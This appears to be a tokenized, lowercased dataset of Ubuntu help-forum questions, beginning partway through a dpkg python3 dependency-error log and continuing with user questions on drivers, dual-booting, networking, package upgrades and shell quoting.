prevent configuration of lsb-release : lsb-release depends on python3 ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . dpkg : error processing lsb-release ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3-apt : python3-apt depends on python3 ( > = 3.3 ) ; however : package python3 is not configured yet . python3-apt depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . dpkg : error processing python3-apt ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-menus : gnome-menus depends on python3 ; however : package python3 is not configured yet . gnome-menus depends on python3 : any ( > = 3.1 ) ; however : package python3 is not configured yet . dpkg : error processing gnome-menus ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-control-center : gnome-control-center depends on gnome-menus ( > = 2.12.0 ) ; however : package gnome-menus is not configured yet . dpkg : error processing gnome-control-center ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-bluetooth : gnome-bluetooth depends on bluez ( > = 4.36 ) ; however : package bluez is not configured yet . dpkg : error processing gnome-bluetooth ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of indicator-bluetooth : indicator-bluetooth depends on bluez ( > = 4.36 ) ; however : package bluez is not configured yet . indicator-bluetooth depends on gnome-control-center | ubuntu-system-settings ; however : package gnome-control-center is not configured yet . package ubuntu-system-settings is not installed . indicator-bluetooth depends on gnome-bluetooth | ubuntu-system-settings ; however : package gnome-bluetooth is not configured yet . package ubuntu-system-settings is not installed . dpkg : error processing indicator-bluetooth ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-user-share : gnome-user-share depends on gnome-bluetooth ; however : package gnome-bluetooth is not configured yet . dpkg : error processing gnome-user-share ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3-pkg-resources : python3-pkg-resources depends on python3 ( > = 3.2 ) ; however : package python3 is not configured yet . python3-pkg-resources depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . dpkg : error processing python3-pkg-resources ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3-defer : python3-defer depends on python3 ( > = 3.2 ) ; however : package python3 is not configured yet . dpkg : error processing python3-defer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3-aptdaemon : python3-aptdaemon depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-aptdaemon depends on python3-apt ( > = 0.8.5~ubuntu1 ) ; however : package python3-apt is not configured yet . python3-aptdaemon depends on python3-defer ( > = 1.0.6 ) ; however : package python3-defer is not configured yet . python3-aptdaemon depends on python3-dbus ; however : package python3-dbus is not configured yet . python3-aptdaemon depends on python3-gi ; however : package python3-gi is not configured yet . python3-aptdaemon depends on python3-pkg-resources ; however : package python3-pkg-resources is not configured yet . dpkg : error processing python3-aptdaemon ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3-aptdaemon.pkcompat : python3-aptdaemon.pkcompat depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-aptdaemon.pkcompat depends on python3-aptdaemon ( = 1.1.1-0ubuntu4 ) ; however : package python3-aptdaemon is not configured yet . dpkg : error processing python3-aptdaemon.pkcompat ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of system-config-printer-gnome : system-config-printer-gnome depends on packagekit-system-interface ; however : package packagekit-system-interface is not installed . package python3-aptdaemon.pkcompat which provides packagekit-system-interface is not configured yet . dpkg : error processing system-config-printer-gnome ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of aptdaemon : aptdaemon depends on python3 : any ( > = 3.2 ) ; however : package python3 is not configured yet . aptdaemon depends on python3.3 ; however : package python3.3 is not configured yet . aptdaemon depends on python3-aptdaemon ( = 1.1.1-0ubuntu4 ) ; however : package python3-aptdaemon is not configured yet . aptdaemon depends on python3-gi ; however : package python3-gi is not configured yet . dpkg : error processing aptdaemon ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dh-python : dh-python depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . dpkg : error processing dh-python ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python3.3-minimal python3-minimal python3.3 python3 python3-gi python3-dbus bluez lsb-release python3-apt gnome-menus gnome-control-center gnome-bluetooth indicator-bluetooth gnome-user-share python3-pkg-resources python3-defer python3-aptdaemon python3-aptdaemon.pkcompat system-config-printer-gnome aptdaemon dh-python e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i do : sudo dpkg -- configure python3 i get : dpkg : dependency problems prevent configuration of python3 : python3 depends on python3.3 ( > = 3.3.1-1~ ) ; however : package python3.3 is not configured yet . python3 depends on python3-minimal ( = 3.3.2-14ubuntu1 ) ; however : package python3-minimal is not configured yet . python3 depends on dh-python ; however : package dh-python is not configured yet . dpkg : error processing python3 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python3 and when i do : sudo dpkg -- configure python3.3-minimal i get : setting up python3.3-minimal ( 3.3.2-7ubuntu3.1 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : python3.3-minimal edit after comment by user193537 : when i try to remove python3 : sudo apt-get remove python3 then i get this dependency problem : reading package lists ... done building dependency tree reading state information ... done package 'python3 ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up python3.3-minimal ( 3.3.2-7ubuntu3.1 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python3.3 : python3.3 depends on python3.3-minimal ( = 3.3.2-7ubuntu3.1 ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3.3 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python3.3-minimal python3.3 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
434746	inspiron 1545 bcm 4312 wifi	i have installed ubuntu 12.04 today on my inspiron 1545 and it works great . i am on an ethernet connection but would like my wifi to work too . i admit that this is my first time using any linux distribution and i have n't got much experience with it . when i go to my networkmanager , he does n't show me any wifi connections . i already tried many codes according to other similar threads and installed a specific broadcom driver but i still do not know how to proceed now .
434747	probleme with battery icon in xubuntu 13.10	after upgrading xubuntu to 13.10 i have this issue with battery icon
434749	touch screen , wacom , producing lines offscreen ( xournal et al )	i 'm getting an error writing in xournal that looks like this : that is , whenever my pen touches the screen , it draws a line from upper left off-screen to the point where i connect . i remember having a problem when i first installed ubuntu on a tablet years ago , in like 2007 , when the solution was much fiddling in xorg.conf , which i do n't believe is even used anymore . how can i fix this ? i 'm running ubuntu 13.10 in a virtualbox on a surface pro 2 . update seems to be confined to virtualbox , actually ? trying to isolate the bug , i exported my virtual machine and loaded it in vmware player . there , i was able to use xournal without this error . ( however , there i have a bunch of new errors i do n't want , so i 'd prefer a solution still for virtualbox . ) update 2 i installed ubuntu 14.04 on a new machine and have the same problem . this does not seem to be limited to either xournal or virtualbox . it occurs both virtualized and native . is this just generally a bug in ubuntu 's wacom drivers ? also , how would i be the lucky person to get this bug on 2 totally separate devices ( on ms surface pro , one lenovo x1 ) where no one else seems to get it at all ?
434755	installing ds9 on ubuntu 12.04	i am trying to install ds9 astro-image viewer on ubuntu 12.04 using software-center , but it keeps giving me the message : there isnât a software package called 'saods9 ' in your current software sources . how can i install it through software-center ? is there another way to install ds9 astro-image viewer , without using software-center ?
434758	after manufactor logo computer wait few minutes before start loading lubuntu	from live usb loading is normal . before lubuntu there was zorin os - booting was normal . and on this black screen before i will see lubuntu logo - i think computer doing something actively , because i feel the heat near the fan . but what - few minutes ? my second pc with lubuntu not have this problem . if it important - i cloned system from my old laptop with clonezilla and restored image to this pc - my old pc does not have this problem . and maybe i see this strange pause in my /var/log/dmesg - first line with 150 : [ 20.843137 ] [ < c161f620 > ] ? kernel_init+0x10/0x140 [ 20.843142 ] [ < c1635cf7 > ] ? ret_from_kernel_thread+0x1b/0x28 [ 20.843147 ] [ < c161f610 > ] ? rest_init+0x70/0x70 [ 20.843155 ] -- - [ end trace f966914885aa0fc1 ] -- - [ 20.843160 ] perf samples too long ( 3127 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 [ 150.011726 ] hpet1 : lost 119937817 rtc interrupts [ 150.012223 ] rtc_cmos 00:04 : alarms up to one month , y3k , 114 bytes nvram , hpet irqs [ 150.012328 ] device-mapper : uevent : version 1.0.3 [ 150.012460 ] device-mapper : ioctl : 4.25.0-ioctl ( 2013-06-26 ) initialised : dm-devel @ redhat.com [ 150.012488 ] platform eisa.0 : probing eisa bus 0 it happens not by every boot .
434767	managing multiple servers with shared accounts and filesystem	at work we have about 7 servers , quite heterogeneous but all running amd64 architectures , which we would like to join and manage from a single machine , preserving the fact that all of them can also be used as desktop computers . the basic idea is to have all servers share configuration ( i.e . installed software ) , accounts and one partition devoted to a shared filesystem . is this posible with ubuntu ? so far we have had to install ubuntu and manage it on each individual computer , but it is a mess to keep up with upgrades and allow people access to different computers . does ubuntu and any of the tools it provides ( maas , juju , etc ) help in any way here ? p.s . : we would like to stick to free software here . we can not afford pay for maintenance and also this is a private network sitting behind a firewall .
434769	realtek trl 8111e fails getting ip address	i am running ubuntu 12.10 ( fully updated ) kde desktop , my realtek 8111e lan card is detected correctly but fails when trying to get an ip address . i have successfully installed the drivers from the realteck website , and still it fails trying to get an ip . i have tried manually setting the ip , when i do this there is no communication at all . i should mention the card works flawlessly in windows .
434771	ca n't upgrade php version from 5.2.10 to any newer version on 12.04 desktop	i know this question has been asked and answered several many on this forum so i hate to ask it again . unfortunately none of the solutions i 've seen posted have worked for me to upgrade my php sever . i had ubuntu 10.04 installed with php version 5.2.10 . i 've upgraded my ubuntu install to 12.04 with no problems , however every attempt i make to upgrade my php server using all of the solutions , packages , repositories , commands , etc i 've found here have not worked . each attempt has ended with the message that php is already at the newest version . i have a feeling i may have downgraded php from a newer version to 5.2 oh so long ago , but i ca n't remember . is there a way to safely uninstall php 5.2 and upgrade to a newer supported version ? any additional help i can get would be greatly appreciated . thank you . dpkg -l | grep -p '\sphp5\s' dpkg-query : warning : parsing file '/var/lib/dpkg/status ' near line 16164 package 'ffmpeg ' : error in version string '4 : svn-r24992-1 ' : version number does not start with digit dpkg-query : warning : parsing file '/var/lib/dpkg/status ' near line 42601 package 'qt-faststart ' : error in version string '4 : svn-r24992-1 ' : version number does not start with digit ii php5 5.2.10.dfsg.1-2ubuntu6 server-side , html-embedded scripting language ( metapackage ) ii php5-cli 5.2.10.dfsg.1-2ubuntu6 command-line interpreter for the php5 scripting language ii php5-common 5.2.10.dfsg.1-2ubuntu6 common files for packages built from the php5 source tskipton @ sscl : ~ $ /etc/apt/sources.list # # deb cdrom : [ ubuntu-server 10.04 lts _lucid lynx_ - release i386 ( 20100427 ) ] / lucid main restricted deb-src http : //archive.ubuntu.com/ubuntu precise restricted main # added by software-properties # deb cdrom : [ ubuntu-server 10.04 lts _lucid lynx_ - release i386 ( 20100427 ) ] / lucid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //us.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security restricted main multiverse universe # added by software-properties deb http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse
434774	ubuntu 13.10 32 bit - install screen prevents install	i created a dvd install and a usb boot . bothe only get as far as the what language screen and i am unable to choose or move beyond the strange screen . apprently being new prevents use of images . i hope the links provided work . i am using an hp dv6707 laptop with 2gb memory .
434776	ubuntu one authentication failing with 404	iâ´ve been using ubuntu one web authentication as described here is there a way to get an access token via ubuntuone oauth ? but https : //one.ubuntu.com/oauth/request has stopped working , it returns 404 is it a bug or something has changed ? thanks , alvaro .
434779	dual boot wins 7 pro 64bit , and ubuntu 12.04 lts	hi to all of you who work so hard , to keep this community together , its fantastic what you do.can you help me to understand where i 'm going wrong with this , please . i want to install ubuntu 12.04 lts , to run along side wins7 pro 64bit my c drive is 1 tbytes , i 'd like to install and run , both wins 7 and ubuntu 12.04lts on the same drive , please advise , with a detailed discription and pictures of how to go about the partition , in the ubuntu , partition manager , as i ca n't seem to complete the install , although i have the iso , on a dvdr disk and can boot from it , and windows powers up i have the option of windows or ubuntu , if i choose ubuntu , and place my disk in the cdrom , it will boot , so do i partition in windows or do i partition in the ubuntu ? as i 'd like to finish off the installation d drive is 500gb e drive is 1 tbyte i 'm a big fan philip marote
434780	internet issues vmware and ubuntu	it has been suggested a vmware issue , but the network icon in vmware tray shows green and says nat ... also , issues begun after an ubuntu update . this is my response from ip addr - it tries connecting and never does , my main os windows 8 is connected though . not really sure where to go from here tom @ ubuntu : ~ $ ip addr 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:0c:29:15:7d : f1 brd ff : ff : ff : ff : ff : ff inet6 fe80 : :20c:29ff : fe15:7df1/64 scope link valid_lft forever preferred_lft forever route -n results -- - empty ? tom @ ubuntu : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface
434783	error -12 on initialization and also can not find the meminfo file	this is a new build with the following hardware . abit kv8 pro motherboard amd athion 3400+ cpu 2 gigs ram 1 80 ide hd 1 1 tb sata hd 1 haupauge 1600 pci /w ir remote 3 haupauge 1600 pci capture cards this error flashes 3 times on startup after the first mythbubtu screen i know i have to allocate more memory , but i ca n't find the meminfo file . i am also not sure how to go about it . ioremap failed . ca n't get a window into cx23418 memory and register space each capyure card with a cx23418 needs 64 mb of vmalloc address space for the window check the output pg 'grep vmallco /proc /meminfo' use the vmalloc '' kernel command line option to set vmalloctotal to a larger value error -12 on initialization a lot of other things do n't work at this time but i think after the memory errors are gone most of the other problems will be corrected also . thanks
434784	any way to get an amd hd4250 graphics to work in 13.10 with good performance ? mine gets slower until unusable	i have an asus m5a88-v evo motherboard with an integrated amd/ati rs880 [ radeon hd4250 ] . i am running ubuntu 13.10 64bit and it seems to get slower until it is unusable . especially the graphics animations , ie switching windows . i checked and it is using the gallium 0.4 on amd rs880 driver . is that the right one and is there something that needs to be done to get it to work correctly ? the only thing i have seen suggested in other places is to go back to a version before 12.10 . that seems impractical at this point . is there any reason to expect it will work in 14.04 lts ?
434785	make : *** [ rastertostar ] error 1	when im compiling a printer driver , i use make and i get this error : make : * [ rastertostar ] error 1 what do i do ? this goes back to this post : how to install a star printer driver ?
434788	mustek bearpaw 2400cu ubuntu 13.10	i try to install my old mustek bearpaw 2400cu scanner to my ubuntu 13.10 . i have installed xsane and ps2fw.usb is in folder /usr/share/sane/gt68xx . i edit /etc/sane.d/gt68xx.conf lines with bearpaw 2400 cu to this : # mustek bearpaw 2400 cu : override `` mustek-bearpaw-2400-cu '' firmware `` /usr/share/sane/gt68xx/ps2fw.usb '' when i start simple scan i see scanner connected but when i want to scan it will give error could not connect to scanner after ( 20 seconds maybe ) with xsane image scanning program i have error gt68xx : libusb:002:027 invalid argument ( after 20 seconds maybe ) do you have any idea where could by problem ? thank you for any answers
434791	ca n't get ubuntu 13.10 64bit to install	i have windows 8.1 and i 'm trying to install ubuntu 13.10 on to my 750gb hard drive as i have windows 8.1 on my 3tb hard drive . i tried to install it from a usb but no luck and when i download it from ubuntu.com and burn it to a disk my computer wo n't boot from the disk . i even switched my boot to boot from disk . what else can i do ?
434792	dual-boot installation ubuntu 13.10 and windows 7 64 bit	so i 've been spending tons of hours on this issue , nothing has been able to give me an exact result and i do n't have a ton more time to spend on this issue . i have a lenovo y580 with a 64gb ssd and a 750gb hdd . currently , i have ubuntu installed on the hdd and nothing on the ssd . all of my user files on both ubuntu and windows 7 and lenovo drivers have been backed up , so i do n't need to worry about that . my end goal is to be able to dual boot from the ssd , and have my windows 7 and ubuntu os files located there and also some of the most used programs ( office ) . my hdd will hold all of my user data files , programs , etc . currently , i have 4 partitions showing up in gparted . /dev/sda ( 59.63 gb ) unallocated /dev/sdb ( 698.64 gb ) /sdb1 : fat32 , 487mb , msftdata /sdb2 : ext4 , 667.53 gb , /sdb3 : linux-swap , 7.90 gb however , sda does n't show up anywhere outside of ubuntu , i.e . in the bios settings or boot selection menu before loading the os . i 'm trying to install windows 7 straight to the ssd , and then install ubuntu after that . however the windows 7 installer gives me an error when i try to install in that location . so my question is , what do i need to do to prepare my ssd for it to be accessible by the windows 7 installer ? is the problem in the partitioning of the drive , or does it not have the proper drivers to access it ? i do n't want to spend anymore time fuddling around until i have a clearer picture of what is actually going on with the dual-boot setup . any information you can give me regarding my situation will be much appreciated , thank you .
434796	youtube works with my xp but ubuntu	i have a self made computer amd pros gforce video card 6600gt running xp and my windows plays youtube fine but when i boot ubuntu it do n't can anybody tell why
434799	how do i enable my netgear wnda3100v2 n600 wireless dual band usb adapter	i can connect to the internet using a cable from the modem to the computer , but am unable to connect via the wireless usb adapter . i have an old computer ( even has a floppy ) and runs windows xp . my aim is to get rid of windows and run ubuntu , but i do n't want to delete the windows os just yet as the wireless connection works on it . i am using a netgear wnda3100v2 n600 wireless dual band usb adapter ( version 2.3 )
434801	need reboot to detect the hsdpa-h mobilelink usb modem	i have following the answer detailing in the thread ( 3g usb modem not working in 12.04 ) to detect my usb modem , hsdpa-h mobilelink . ( 20a6 : f00e is the product id i get with lsusb and usb-devices ) sudu do nano /usr/bin/usbmodemscript and type # ! /bin/bash echo 20a6 f00e > /sys/bus/usb-serial/drivers/option1/new_id then save and exit . chmod +x /usr/bin/usbmodemscript nano /etc/udev/rules.d/option.rules and type attrs { idvendor } == '' 20a6 '' , attrs { idproduct } == '' f00e '' , run+= '' /usr/bin/usbmodemscript '' attrs { idvendor } == '' 20a6 '' , attrs { idproduct } == '' f00e '' , run+= '' /sbin/modprobe option '' then save and exit . sudo reboot after the reboot , the modem can be detected and i am able to connect to the internet . however , sometimes when i turn on my computer , the modem can not be detected , and i need to reboot my computer , and after reboot , it shows up in the network manager again . this also happens when i hibernate my computer . before hibernate , the modem can be detected but after hibernate it can not . i have already try re-plug the usb modem and restart the network manager : sudo service network-manager restart , but it still can not work . is there anyway that i can detect my usb modem again without reboot ? i am using ubuntu 12.04 in hp pavilion dv4-1015tx .
434802	script to install ubuntu and same set of programs on several computers	i have several computers at different locations , and i want all of them to be set up in exactly the same way . is it possible to write a script which i can run once i have installed a new ubuntu os to automatically download and install all the programs which i need ? i would like to install programs such as google chrome r eclipse etc
434803	ca n't create second ntfs partition	i have an older windows xp media center edition computer . i wanted to install ubuntu on it as a second os . i have a 100gb hard drive and i wanted to create 3 partitions on it . one 45gb partition for windows os and programs i had already installed , one 13gb partition for ubuntu os , and one 40gb partition for data . i am a newbie to ubuntu and partitioning . i burned the ubuntu 12.04 installation cd and put it in my computer . i clicked the `` choose something else '' button to edit partitions . i first resized the winxp partition . i then created the 13gb ext4 file system partition for the ubuntu os , as well as a 2.5gb partition for the swap area ( i have 2gb of ram ) . i then tried to make the ntfs partition using the rest of the drive space for my data . to my surprise , i could make the partition any file system except for ntfs ! it would n't even show up on the list . i then started trying every possible menu configuration to see if i could get it to show up , but nothing worked . i even tried removing the previous two partitions to see if the ntfs option would show up , but it never did . i looked on your forums for advice but apparently i 'm the only one who 's ever had this problem . please help .
434804	how can i update the text splash before ubiquity	i am customizing a kubuntu distribution and i am struggling to change the text splash screen before ubiquity starts . the screen that says `` kubuntu 13.10 '' with dots for the progress bar . i understand the process for updating the plymouth splashes , to update them . update-alternatives -- install /lib/plymouth/themes/text.plymouth text.plymouth /lib/plymouth/themes/my_theme/text.plymouth 100 update-alternatives -- config text.plymouth update-initramfs -u but this does not affect the plymouth text splash before ubiquity . obviously my knowledge is limited in how this actually works . but digging through the iso with iso master , i found a package called 'initrd.lz ' in /casper/ . after figuring out how to unpack it , i discovered that there are also similar plymouth files in here . i am assuming that this is the plymouth theme that the boot loader refers to before loading into ubiquity . since it has no already existing file system to refer to for the splash . so , now that i have the files i need to edit , i edit them . but i run into a wall . i do n't see how the commands that i used to update plymouth in my file system before , can work here . it seems like the boot image gets updated when i run those commands , and i am not sure how to use the same process to update the contents of initrd.lz . of course , i could be way off the mark here as well , thanks in advance for any help .
434808	install ubuntu as a dual boot system in mac air	http : //www.maketecheasier.com/install-dual-boot-ubuntu-in-macbook-air this is what i followed to install ubuntu as a dual system for my mac air . i have finished installing ubuntu in my mac and i can see the icon in the interface of refit . but when i selected it and typed enter , i just got a black screen . as this article said , i need to install gpt fdisk and build a hybrid boot menu . so i install the gpt fdisk in the os x. but for the hybrid boot menu , i really do n't understand how to build it even if there is another post : http : //ubuntuforums.org/showthread.php ? t=1810275 & page=19 & p=11215214 # post11215214 can any one help me to build a hybird boot menu ?
434809	ubuntu 12.04 wired connection does n't work !	i just installed ubuntu again after a few months of using windows . at first i tried to install it by using an .iso file , but i got stuck at 43 % on the partitioner , so i figured out i should use the wubi installer . so i installed ubuntu 12.04 , rebooted my pc , and went on to ubuntu . everything was working fine , except the internet connection . it was stuck trying to connect to wired ethernet , but it did n't work . when i changed from dhcp to manual and entered an ip-adress , it connected , but i still could n't use internet , it would n't enter any sites . i 've searched all over internet and tried different solutions , but none of them is working for me . i 've had ubuntu installed on the same computer before , and then it worked just fine , but not this time . ifconfig output eth0 link encap : ethernet hwaddr c8:60:00 : c4:4c : b4 inet6 addr : fe80 : :ca60 : ff : fec4:4cb4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3399 errors:0 dropped:0 overruns:0 frame:0 tx packets:3090 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2340549 ( 2.3 mb ) tx bytes:334975 ( 334.9 kb ) interrupt:20 memory : f7300000-f7320000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:796 errors:0 dropped:0 overruns:0 frame:0 tx packets:796 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:58956 ( 58.9 kb ) tx bytes:58956 ( 58.9 kb ) network manager tool output networkmanager tool state : connecting - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : connecting ( getting ip configuration ) default : no hw address : c8:60:00 : c4:4c : b4 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on route -n output kernel ip routing table destination gateway genmask flags metric ref use iface ping output ping connect : network is unreachable when i try to configure the /etc/network interface file to set dhcp , my network tab says : device not managed . i have also tried to reinstall ubuntu , but it still wont work . help me !
434811	how do you install emacs from thumb drive ?	my internet is currently down on my virtual machine so i have a .tar file for emacs on a thumb drive and i would like to install it on ubuntu . any help would be greatly appreciated . *i have attempted to follow the instructions in the install file the following is the last few lines outputted from running ./configure checking for gzip ... /bin/gzip checking for makeinfo ... no checking for -znocombreloc ... yes configure : checking the machine- and system-dependent files to find out - which libraries the lib-src programs will want , and - whether the gnu malloc routines are usable ... checking for special c compiler options needed for large files ... no checking for _file_offset_bits value needed for large files ... no configure : error : crt*.o not found . use -- with-crt-dir to specify the location . tom @ ubuntu : ~/desktop/emacs-23.4 $ make make : *** no targets specified and no makefile found . stop . im assuming the third to last line has kept a makefile from being created , but i have no idea what it means
434812	ubuntu on thl t100s	will ubuntu work on my thl t100s ? i know there is a list of devices and it 's not on it but as it 's a clone like almost all the chinese devices thought there 's maybe some chance .
434814	ubuntu will load , but not xubuntu	i am attempting to replace the ubuntu 12.04 i have on my laptop with xubuntu 12.04 . i formatted my linux partition and started with a fresh install of xubuntu but both booting live from the cd or from the xubuntu i have installed will launch me straight into the command line . the command startx gives an error of no screen found . i have searched through this site and found several similar issues posted but attempting to delete the /etc/x11/xorg.conf file as suggested on one forum thread did nothing ( my system lacks this file completely ) , and i 'm embarrassed to say , i did n't really understand what the heck any of the other fixes were saying . note that i could install normal ubuntu with no problem , this issue only occurs for xubuntu .
434817	what is the difference between sudo -i and su ?	it seems as if there is no difference whatsoever . when the whoami or id commands are run , they all yield root credentials . is this an illusion ? if the root account is disabled by default in ubuntu , and therefore su gives and authentication error , then why allow sudo -i edit : excuse me , the only difference i have learned of is that sudo -i asks for the password of the user who invoked the command , and su asks for root , or some other target user 's password . is there any other difference ?
434822	apparent dns error when virtualized ubuntu comes back from sleep	i am running ubuntu 13.10 in virtualbox on a windows 8 host . when my host machine sleeps and wakes , my tabs in guest ubuntu no longer connect even after the main connection is restored . what makes me think it 's a dns error is that i can still do google searches , and see results for new searches -- -but when i click through , i get an error that it ca n't connect : server not found . try typing www.example.com instead of ww.example.com . i /think/ this means google is my dns and i can connect to it , but ca n't connect to new links . networking otherwise works fine , except for this restore from sleep issue .
434823	how do i install popcorn time from the new yify github ?	how can i install popcorn time in ubuntu ? the old popcorn time is no more , the new popcorn time is being maintained by yify .
434825	stale nfs file handle on shutdown	i 'm running kubuntu 13.10 , and i have a network attached storage device ( hp mediavault ) . usually , but not always , when i shut down the shutdown gets stuck on the message `` stale nfs file handle '' . the fstab entry for the device is : hpmediavault : /shares/volume1/fileshare /mnt/mediavault nfs auto , users , noatime , nolock , bg , nfsvers=3 , intr , tcp , actimeo=1800 , _netdev , x-systemd.automount 0 0 how can i prevent this blockage ?
434831	ubuntu hangs on boot	today i decided to install ubuntu on my desktop . the installation went smoothly and i restarted my computer . then , the computer showed the login screen , and then hanged on a solid purple screen . i waited a long time but nothing happened and i was forced to force shut down my computer . after retrying multiple times , it still did n't work . what 's wrong ?
434832	why does exclamation mark within double quotes cause a bash error ?	if anyone wants to close as dupe of differences between doublequotes `` `` , singlequotes ' ' and backticks ´ ´ on commandline ? please leave a comment explaining how answers there explain what i 'm asking here . thanks . please look at these commands : $ notify-send sync time ! $ notify-send 'sync time ! ' $ notify-send `` sync time ! '' bash : ! `` : event not found $ the first two commands produce a notification bubble as expected . the third gives the error shown . and $ echo sync time ! sync time ! $ echo 'sync time ! ' sync time ! $ echo `` sync time ! '' bash : ! `` : event not found $ here as well , the echo works for first two commands but not in the third . more problems here ( although i was not planning on using this ) : both notify-send `` sync ! time '' and echo `` sync ! time '' give bash : ! time '' : event not found . but both notify-send and echo work with `` sync ! time '' can someone please explain why the bash : ! `` : event not found error appears ?
434838	nvidia driver is not loading after kernel update	i downloaded nvidia driver from nvidia 's website . i set up it under kernel 3.11.0-17 . every thing was almost perfect for me . it was even working after update to kernel 3.11.0-18 . however i wanted to clear the old kernel , so i uninstalled kernel 3.11.0.17 . ubuntu just went to command line after boot screen , then i typed sudo depmod -a , after rebooting things are back . however , command line screen came again at the next restart . so now i need to keep calling sudo depmod -a and restarting again and again . how do i get over this ?
